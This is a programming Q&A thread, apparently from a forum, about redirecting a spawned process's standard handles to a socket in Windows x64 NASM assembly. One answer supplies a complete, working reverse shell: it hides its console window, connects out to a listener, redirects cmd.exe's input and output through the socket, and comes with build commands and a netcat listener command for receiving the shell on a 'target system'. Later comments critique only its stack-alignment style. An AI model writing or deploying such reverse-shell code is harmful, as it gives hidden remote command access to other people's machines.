How to use STDERROR/STDOUTPUT/STDINPUT in CreateProcessA with socket
Can someone explain to me how I could use STDERROR/STDOUTPUT/STDINPUT for redirecting in my socket?
Structure informations :

hStdInput
If dwFlags specifies STARTF_USESTDHANDLES, this member is the standard input handle for the process. If STARTF_USESTDHANDLES is not specified, the default for standard input is the keyboard buffer.
If dwFlags specifies STARTF_USEHOTKEY, this member specifies a hotkey value that is sent as the wParam parameter of a WM_SETHOTKEY message to the first eligible top-level window created by the application that owns the process. If the window is created with the WS_POPUP window style, it is not eligible unless the WS_EX_APPWINDOW extended window style is also set. For more information, see CreateWindowEx.
Otherwise, this member is ignored.
hStdOutput
If dwFlags specifies STARTF_USESTDHANDLES, this member is the standard output handle for the process. Otherwise, this member is ignored and the default for standard output is the console window's buffer.
If a process is launched from the taskbar or jump list, the system sets hStdOutput to a handle to the monitor that contains the taskbar or jump list used to launch the process. For more information, see Remarks.Windows 7, Windows Server 2008 R2, Windows Vista, Windows Server 2008, Windows XP and Windows Server 2003:  This behavior was introduced in Windows 8 and Windows Server 2012.
hStdError
If dwFlags specifies STARTF_USESTDHANDLES, this member is the standard error handle for the process. Otherwise, this member is ignored and the default for standard error is the console window's buffer.

Here's my code :
; ASM file combining network connection and process creation

; Include necessary header files
extern WSAStartup
extern WSAConnect
extern WSACleanup
extern socket
extern closesocket
extern CreateProcessA
extern WaitForSingleObject
extern GetExitCodeProcess
extern printf
extern ExitProcess
extern CloseHandle

; Define constants
%define AF_INET 2
%define SOCK_STREAM 1
%define IPPROTO_TCP 6

section .data
; Network data
ip_address dd 0x1B01A8C0 ; 192.168.1.27 in network format (little-endian)
port dw 0x0540 ; Port 16389 in network format

; Command to execute
cmd_line db "C:\Windows\System32\cmd.exe", 0

; Log messages
create_process_msg db "Creating process...", 13, 10, 0
process_done_msg db "Process terminated with exit code: %d", 13, 10, 0
error_process_msg db "Error: Failed to create process.", 13, 10, 0
network_connect_msg db "Attempting to connect to network...", 13, 10, 0
network_error_msg db "Network connection error.", 13, 10, 0

section .bss
; Reserve space for variables
wsadata resb 400 ; WSADATA structure
sin resb 68 ; STARTUPINFO structure
pi resb 24 ; PROCESS_INFORMATION structure
exit_code resd 1 ; Process exit code

section .text
global main

main:
sub rsp, 40 ; Align stack and reserve space

; Initialize Winsock
mov rcx, 202h ; Version 2.2
lea rdx, [wsadata]
call WSAStartup
test rax, rax
jnz exit ; If error, exit

; Display network connection message
lea rcx, [rel network_connect_msg]
call printf

; Create socket
mov rcx, AF_INET
mov rdx, SOCK_STREAM
mov r8, IPPROTO_TCP
call socket
mov r13, rax ; Save socket descriptor to r13
cmp r13, -1
je cleanup_wsa ; If socket error, clean Winsock

; Prepare sockaddr structure
sub rsp, 32 ; Allocate space on stack and align
mov word [rsp], AF_INET ; Address family
mov eax, [port]
mov [rsp+2], ax ; Port
mov eax, [ip_address]
mov [rsp+4], eax ; IP address

; Call WSAConnect
mov rcx, r13 ; Socket descriptor
mov rdx, rsp ; name (pointer to sockaddr structure)
mov r8, 16 ; namelen
xor r9, r9 ; lpGQOS
push 0 ; lpCallerData
push 0 ; lpCalleeData
push 0 ; lpSQOS
sub rsp, 32 ; Shadow space for Windows x64 calling convention
call WSAConnect
add rsp, 56 ; Clean stack

test rax, rax
jnz close_socket ; If connection error, close socket

; Show process creation message
lea rcx, [rel create_process_msg]
call printf

; Prepare STARTUPINFO
mov dword [rel sin], 68 ; STARTUPINFO.cb = 68

; Call CreateProcessA
xor ecx, ecx ; lpApplicationName (NULL)
lea rdx, [rel cmd_line] ; lpCommandLine
xor r8, r8 ; lpProcessAttributes (NULL)
xor r9, r9 ; lpThreadAttributes (NULL)

mov dword [rsp + 32], 1 ; bInheritHandles = TRUE
 mov [rsp + 40], ecx; dwCreationFlags = 0
 mov [rsp + 48], ecx; lpEnvironment
 mov [rsp + 56], ecx; lpCurrentDirectory
 lea rax, [rel sin]
 mov [rsp + 64], rax; lpStartupInfo
 lea rax, [rel pi]
 mov [rsp + 72], rax; lpProcessInformation
 call CreateProcessA

 ; Verify process creation
 rax test, rax
 jz process_creation_failed

 ; Wait for the process to complete
 mov rcx, [rel pi + 0]; pi.hProcess
 mov rdx, -1 ; INFINITE timeout
 call WaitForSingleObject

 ; Retrieve exit code
 mov rcx, [rel pi + 0]; pi.hProcess
 lea rdx, [rel exit_code]; lpExitCode
 call GetExitCodeProcess

 ; Show exit code
 lea rcx, [rel process_done_msg]
 mov edx, [rel exit_code]
 call printf

 ; Close handles
 mov rcx, [rel pi + 0]; pi.hProcess
 call CloseHandle
 mov rcx, [rel pi + 8]; pi.hThread
 call CloseHandle

close_socket:
 ; Close socket
 mov rcx, r13
 call closesocket

cleanup_wsa:
 ; Clean Winsock
 call WSACleanup

exit:
 ; Exit the program
 xor rcx, rcx ; Exit code 0
call ExitProcess

process_creation_failed:
; Show process error message
lea rcx, [rel error_process_msg]
call printf

; Exit with error code
mov ecx, 1
call ExitProcess


Begin by writing the same program in C, to get an understanding how it works. Then it's relatively easy to translate it into assembly if you really need to (for a school assignment or similar, there's really no other reason).

I've updated your Windows NASM code to redirect standard handles to a socket. Here's a complete NASM example. It's functional but could be tidied up.
nasm_tcp_reverse_shell.asm
; Reverse shell to 127.0.0.1:666. Run Netcat: nc -lvvp 666
; NASM version 2.16.03 compiled on Apr 17 2024
;
; nasm -f win64 -g -F cv8 nasm_tcp_reverse_shell.asm -o nasm_tcp_reverse_shell.obj
; link.exe /DEBUG /LARGEADDRESSAWARE:NO /SUBSYSTEM:CONSOLE /ENTRY:start nasm_tcp_reverse_shell.obj Ws2_32.lib Kernel32.lib

    global          start
    default         rel
    
    extern          FreeConsole
    extern          WSAStartup
    extern          RtlZeroMemory
    extern          getaddrinfo
    extern          WSASocketA
    extern          connect
    extern          CreateProcessA
    extern          WaitForSingleObject
    extern          CloseHandle
    extern          WSACleanup
    extern          ExitProcess
    extern          WSAGetLastError
    
    %macro ALIGN_STACK 1
        %define NUM_ARGS %1 ; number of arguments
        push    rsp
        push    qword [rsp]    
        %if (NUM_ARGS < 5) || ((NUM_ARGS & 1) == 0)
            and spl, 0F0h ; Even number of arguments
        %else
            or spl, 08h   ; Odd number of arguments
        %endif
    %endmacro

    %macro RESTORE_STACK 0
        %if NUM_ARGS < 5
            lea rsp, [rsp + 5*8]
        %elif (NUM_ARGS & 1) == 0
            lea rsp, [rsp + (NUM_ARGS + 1)*8] ; Even number of arguments
        %else
            lea rsp, [rsp + NUM_ARGS*8] ; Odd number of arguments
        %endif
        pop rsp
    %endmacro   

    STARTF_USESTDHANDLES equ 0x00000100
    STARTF_USESHOWWINDOW equ 0x00000001
    SW_HIDE              equ 0x0000
    SIZEOF_WSADATA       equ 408
    SIZEOF_STARTUPINFO   equ 104
    SIZEOF_PROCESS_INFO  equ 24
    SIZEOF_HINTS         equ 48
    SHADOW_SPACE         equ 32
    AF_UNSPEC            equ 0
    SOCK_STREAM          equ 1
    IPPROTO_TCP          equ 6
    TRUE                 equ 1
    
    ; typedef struct addrinfo {
    ;   int             ai_flags;
    ;   int             ai_family;
    ;   int             ai_socktype;
    ;   int             ai_protocol;
    ;   size_t          ai_addrlen;
    ;   char            *ai_canonname;
    ;   struct sockaddr *ai_addr;
    ;   struct addrinfo *ai_next;
    ; } ADDRINFOA, *PADDRINFOA;    

    AI_FAMILY_OFFSET    equ 4
    AI_SOCKTYPE_OFFSET  equ 8
    AI_PROTOCOL_OFFSET  equ 12
    AI_ADDRLEN_OFFSET   equ 16
    AI_ADDR_OFFSET      equ 32
    
    ; typedef struct _STARTUPINFOA {
    ;     DWORD   cb;
    ;     LPSTR   lpReserved;
    ;     LPSTR   lpDesktop;
    ;     LPSTR   lpTitle;
    ;     DWORD   dwX;
    ;     DWORD   dwY;
    ;     DWORD   dwXSize;
    ;     DWORD   dwYSize;
    ;     DWORD   dwXCountChars;
    ;     DWORD   dwYCountChars;
    ;     DWORD   dwFillAttribute;
    ;     DWORD   dwFlags;
    ;     WORD    wShowWindow;
    ;     WORD    cbReserved2;
    ;     LPBYTE  lpReserved2;
    ;     HANDLE  hStdInput;
    ;     HANDLE  hStdOutput;
    ;     HANDLE  hStdError;
    ; } STARTUPINFOA, *LPSTARTUPINFOA;
    
    SI_DWFLAGS_OFFSET       equ 60
    SI_WSHOWWINDOW_OFFSET   equ 64
    SI_HSTDINPUT_OFFSET     equ 80
    SI_HSTDOUTPUT           equ 88
    SI_HSTDERROR            equ 96
    
    ; typedef struct _PROCESS_INFORMATION {
    ;     HANDLE hProcess;
    ;     HANDLE hThread;
    ;     DWORD dwProcessId;
    ;     DWORD dwThreadId;
    ; } PROCESS_INFORMATION, *PPROCESS_INFORMATION, *LPPROCESS_INFORMATION;
    
    PI_HPROCESS_OFFSET      equ 0
    PI_HTHREAD_OFFSET       equ 8
    
SECTION .data
    REMOTE_ADDR     db "127.0.0.1",0          ; Remote IP address
    REMOTE_PORT     db "666",0                ; Remote port
    CMD_PATH        db "CMD.EXE",0            ; Windows Command Prompt
    MAKEWORD_VAL    dw 0x0202                 ; MAKEWORD(2,2)
    INFINITE        dq -1                     ; 64-bit INFINITE
    
SECTION .bss    
    wsadata         resb SIZEOF_WSADATA       ; WSADATA structure (x64)
    result_ptr      resq 1                    ; Pointer to addrinfo result
    addr_ptr        resq 1                    ; Pointer to current addrinfo
    connectSocket   resq 1                    ; SOCKET
    sinfo           resb SIZEOF_STARTUPINFO   ; STARTUPINFO structure (x64)
    pi              resb SIZEOF_PROCESS_INFO  ; PROCESS_INFORMATION structure
    hints           resb SIZEOF_HINTS         ; addrinfo hints structure

SECTION .text
      
start:
    ; ---------------------------
    ; FreeConsole
    ; ---------------------------
    ALIGN_STACK     0
    sub             rsp, SHADOW_SPACE
    call            FreeConsole
    RESTORE_STACK

    ; ---------------------------
    ; Initialize Winsock
    ; ---------------------------
    ALIGN_STACK     2                     
    lea             rdx, [wsadata]              ; LPWSADATA lpWSADat
    mov             rcx, MAKEWORD_VAL           ; WORD      wVersionRequired
    sub             rsp, SHADOW_SPACE                       
    call            WSAStartup
    RESTORE_STACK

    ; ---------------------------
    ; RtlZeroMemory hints struct
    ; ---------------------------
    ALIGN_STACK     2                        
    mov             rdx, SIZEOF_HINTS           ; size_t Length                  
    lea             rcx, [hints]                ; void*  Destination    
    sub             rsp, SHADOW_SPACE                             
    call            RtlZeroMemory
    RESTORE_STACK
    
    ; ---------------------------
    ; Set up addrinfo hints
    ; ---------------------------
    mov             dword [hints + AI_FAMILY_OFFSET], AF_UNSPEC 
    mov             dword [hints + AI_SOCKTYPE_OFFSET], SOCK_STREAM 
    mov             dword [hints + AI_PROTOCOL_OFFSET], IPPROTO_TCP  

    ; ---------------------------
    ; getaddrinfo
    ; ---------------------------
    ALIGN_STACK     4                              
    lea             r9, [result_ptr]            ; PADDRINFOA      *ppResult
    lea             r8, [hints]                 ; const ADDRINFOA *pHints
    lea             rdx, [REMOTE_PORT]          ; PCSTR           pServiceName
    lea             rcx, [REMOTE_ADDR]          ; PCSTR           pNodeName
    sub             rsp, SHADOW_SPACE                          
    call            getaddrinfo
    RESTORE_STACK

    ; ---------------------------
    ; Retrieve addrinfo result
    ; ---------------------------
    mov             rax, [result_ptr]                        
    mov             [addr_ptr], rax                 ; addrinfo*                    

    ; ---------------------------
    ; Create a Socket
    ; ---------------------------
    ALIGN_STACK     6                                
    mov             rax, [addr_ptr]
    push            0                               ; DWORD               dwFlags
    push            0                               ; GROUP               g
    xor             r9, r9                          ; LPWSAPROTOCOL_INFOA lpProtocolInfo
    mov             r8d, [rax + AI_PROTOCOL_OFFSET] ; int                 protocol
    mov             edx, [rax + AI_SOCKTYPE_OFFSET] ; int                 type
    mov             ecx, [rax + AI_FAMILY_OFFSET]   ; int                 af
    sub             rsp, SHADOW_SPACE
    call            WSASocketA
    RESTORE_STACK
    mov             [connectSocket], rax      

    ; ---------------------------
    ; Connect to Remote Address
    ; ---------------------------
    ALIGN_STACK     3
    mov             rax, [addr_ptr]                 
    mov             r8d, [rax + AI_ADDRLEN_OFFSET]  ; int            namelen
    mov             rdx, [rax + AI_ADDR_OFFSET]     ; const sockaddr *name
    mov             rcx, [connectSocket]            ; SOCKET         s
    sub             rsp, SHADOW_SPACE
    call            connect
    RESTORE_STACK
    
    ; ---------------------------
    ; RtlZeroMemory STARTUPINFO struct
    ; ---------------------------
    ALIGN_STACK     2      
    mov             rdx, SIZEOF_STARTUPINFO         ; size_t Length
    lea             rcx, [sinfo]                    ; void*  Destination 
    sub             rsp, SHADOW_SPACE                   
    call            RtlZeroMemory
    RESTORE_STACK
    
    ; ---------------------------
    ; Initialize STARTUPINFO struct
    ; ---------------------------
    mov             dword [sinfo], SIZEOF_STARTUPINFO               ; sinfo.cb = sizeof(sinfo)
    mov             eax,STARTF_USESHOWWINDOW
    or              eax,STARTF_USESTDHANDLES                        ; STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW
    mov             dword [sinfo + SI_DWFLAGS_OFFSET], eax          ; sinfo.dwFlags = flags
    mov             dword [sinfo + SI_WSHOWWINDOW_OFFSET], SW_HIDE  ; sinfo.wShowWindow = SW_HIDE
    
    ; ---------------------------
    ; Redirect Standard Handles to Socket
    ; ---------------------------
    mov             rax, [connectSocket]      
    mov             qword [sinfo + SI_HSTDINPUT_OFFSET], rax        ; sinfo.hStdInput  = connectSocket
    mov             qword [sinfo + SI_HSTDOUTPUT], rax              ; sinfo.hStdOutput = connectSocket
    mov             qword [sinfo + SI_HSTDERROR], rax               ; sinfo.hStdError  = connectSocket    

    ; ---------------------------
    ; RtlZeroMemory PROCESS_INFORMATION struct
    ; ---------------------------
    ALIGN_STACK     2                 
    mov             rdx, SIZEOF_PROCESS_INFO    ; size_t Length
    lea             rcx, [pi]                   ; void*  Destination   
    sub             rsp, SHADOW_SPACE
    call            RtlZeroMemory
    RESTORE_STACK

    ; ---------------------------
    ; Create a new process (CMD.EXE)
    ; ---------------------------
    ALIGN_STACK     10  
    lea             rax, [pi]                             
    push            rax                       ; LPPROCESS_INFORMATION   lpProcessInformation
    lea             rax, [sinfo]                          
    push            rax                       ; LPSTARTUPINFOA          lpStartupInfo
    push            0                         ; LPCSTR                  lpCurrentDirectory
    push            0                         ; LPVOID                  lpEnvironment
    push            0                         ; DWORD                   dwCreationFlags
    push            TRUE                      ; BOOL                    bInheritHandles
    xor             r9, r9                    ; LPSECURITY_ATTRIBUTES   lpThreadAttributes
    xor             r8, r8                    ; LPSECURITY_ATTRIBUTES   lpProcessAttributes
    lea             rdx, [CMD_PATH]           ; LPSTR                   lpCommandLine
    xor             rcx, rcx                  ; LPCSTR                  lpApplicationName
    sub             rsp, SHADOW_SPACE 
    call            CreateProcessA
    RESTORE_STACK
    
    ; ---------------------------
    ; Wait for the created process to finish
    ; ---------------------------
    ALIGN_STACK     2      
    mov             rdx, INFINITE                   ; DWORD   dwMilliseconds
    mov             rcx, [pi + PI_HPROCESS_OFFSET]  ; HANDLE  hHandle
    sub             rsp, SHADOW_SPACE
    call            WaitForSingleObject
    RESTORE_STACK

    ; ---------------------------
    ; Close Handles
    ; ---------------------------
    ALIGN_STACK     1         
    mov             rcx, [pi + PI_HPROCESS_OFFSET]  ; HANDLE hObject
    sub             rsp, SHADOW_SPACE    
    call            CloseHandle
    RESTORE_STACK   

    ALIGN_STACK     1     
    mov             rcx, [pi + PI_HTHREAD_OFFSET]   ; HANDLE hObject
    sub             rsp, SHADOW_SPACE    
    call            CloseHandle
    RESTORE_STACK   

    ; ---------------------------
    ; Clean Up Winsock
    ; ---------------------------
    ALIGN_STACK     0                     
    sub             rsp, SHADOW_SPACE                                 
    call            WSACleanup
    RESTORE_STACK  

    ; ---------------------------
    ; Exit the Process
    ; ---------------------------
    ALIGN_STACK     1
    mov             rcx, 0                  ; UINT uExitCode
    sub             rsp, SHADOW_SPACE                                 
    call            ExitProcess
    RESTORE_STACK
    
    
    

Assembled using this batch file:
nasm_tcp_reverse_shell.bat
@echo on

if not defined DevEnvDir (
  call "C:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\VC\Auxiliary\Build\vcvars64.bat"
)

nasm -f win64 -g -F cv8 nasm_tcp_reverse_shell.asm -o nasm_tcp_reverse_shell.obj
link.exe /DEBUG /LARGEADDRESSAWARE:NO /SUBSYSTEM:CONSOLE /ENTRY:start nasm_tcp_reverse_shell.obj Ws2_32.lib Kernel32.lib

How It Works
Run Netcat on the remote system to listen for incoming connections:

nc -lvvp 666

Once the target system connects back to the remote listener, the cmd.exe process is executed on the target machine, and its input/output is redirected through the socket connection established by Netcat.


That ALIGN_STACK macro and pushing the stack pointer twice is nasty and inefficient.  IMO, if you don't want to write whole functions in assembly efficiently, don't do it at all.  Oh wait, those aren't even separate functions, you're setting up shadow space and stack alignment and then undoing it once per function call!!! Totally insane.

Just reserve arg-passing space + shadow space at the top of your function (with enough space for the function with the most args), aligning the stack by making the total subtracted from RSP with SUB and PUSH an odd multiple of 8.  (Assuming your start is actually a function that's called with RSP%16==8.  If it's ==0, then an even multiple of 8.).  Then store args to stack memory with mov [rsp+32], whatever if there are any non-register args.  Shadow space example .  The Windows ABI says you shouldn't move RSP mid-function. (for SEH reasons).

The concept for automatic stack alignment used in the ALIGN_STACK  macro was borrowed from the GoAsm Assembler.

If you're making an INVOKE macro that has to work no matter the context, that would make a tiny bit of sense.  Or in inline asm that might run with the stack aligned or not.  If you're writing a whole function by hand, there's no reason to use that clunky slow hack around every call.  x86-64 ABIs are designed not to need stuff like that at all in normal functions, and if you do need to over-align or re-align the stack, you do it once per function not once per call.  This is a terrible example for beginners to copy in terms of how to handle stack alignment.
